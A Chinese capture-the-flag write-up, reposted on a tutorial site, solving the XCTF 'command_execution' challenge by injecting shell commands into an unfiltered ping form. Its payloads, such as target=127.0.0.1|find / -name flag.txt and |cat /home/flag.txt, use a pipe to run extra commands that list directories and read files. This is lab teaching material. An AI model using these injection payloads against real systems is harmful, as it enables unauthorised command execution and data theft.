C/C++教程

12、XCTF command_execution

本文主要是介绍12、XCTF command_execution,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

一打开网站,就看到下面这句话
小宁写了个ping功能,但没有写waf,X老师告诉她这是非常危险的,你知道为什么吗。
在框框里面输

127.0.0.1

有反应,看了一下,返回的数据,感觉是linux
ls,看一下。
可以,那就是linux,
(后面用dir,发现也可以)
反正是可以执行,无所谓了,
先查找文件,用hackbar

target=127.0.0.1|find / -name flag.txt

找到了,/home/flag.txt
去找他们在那个目录,
用ls去查一下有什么文件

127.0.0.1|ls

得到

index.php

hackbar,

http://111.200.241.244:65287/
Post data
target=127.0.0.1|ls ../

得到html

target=127.0.0.1|ls ../../

得到

backups、cache、lib、local、lock、log、mail、opt、
run、spool、tmp、www
target=127.0.0.1|ls ../../../
bin、boot、dev、etc、home、lib、lib64、media、mnt、
opt、proc、root、run、run.sh、sbin、srv、sys、tmp、
usr、var

找到了,直接去访问,

target=127.0.0.1|ls ../../../home
flag.txt
target=127.0.0.1|cat ../../../home/flag.txt

获得flag
(后面发现直接访问,也可以,尴尬,target=127.0.0.1|cat /home/flag.txt
基础知识:

|                       //显示B的执行结果
&                      //简单拼接,A B之间无制约关系

这题&用不了。

这篇关于12、XCTF command_execution的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!